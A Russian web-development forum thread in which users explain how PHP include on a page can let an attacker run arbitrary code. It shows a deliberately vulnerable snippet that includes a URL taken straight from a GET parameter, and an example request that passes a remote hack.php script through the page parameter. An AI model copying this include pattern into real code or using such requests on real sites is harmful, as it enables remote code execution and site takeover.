Форум Сайтостроение Веб-строительство

Инклюд на странице

12
A
На сайте с 25.10.2005
Offline
58
Antimal
#11
MaulNet:
Или допустим получить доступ к чему-либо?

Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе.

M
На сайте с 20.08.2004
Offline
376
Miracle
#12

называет это, если не ошибаюсь, кроссайт

отец сыночка, лапочки дочки и еще одного сыночка
MaulNet
На сайте с 07.08.2005
Offline
348
MaulNet
#13

Denis15, давай пример кода. ))

pauk
На сайте с 26.01.2005
Offline
543
pauk
#14

Помню была легендарная статья PHP. Действительно легкая смена дизайна. Не менее легендарная, чем про ЧПУ, но в отличие от ЧПУ очень вредная.

В ответ была написана статейка Простые шаблоны - опасность хака.

Hi!
AH
На сайте с 18.03.2006
Offline
204
Art-Host
#15
MaulNet:
Хотелось бы узнать - можно ли через сабж как-либо взломать или повредить сайт? Или допустим получить доступ к чему-либо?

через дыры в скриптах:

вот живой пример дырявого скрипта: 


<?

$url = $_GET['url'];

include($url);

взломщик через GET может вставить url своего скрипта.

Цены на регистрацию доменов ( https://1reg.online/domains.price ).
pauk
На сайте с 26.01.2005
Offline
543
pauk
#16
Art-Host:
взломщик через GET может вставить url своего скрипта.

Вместо www.site.ru/?page=main

Поставить www.site.ru/?page=http://site.narod.ru/hack.php

Где hack.php начнёт выполняться. А что в нём - это зависит от фантазии хакера.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий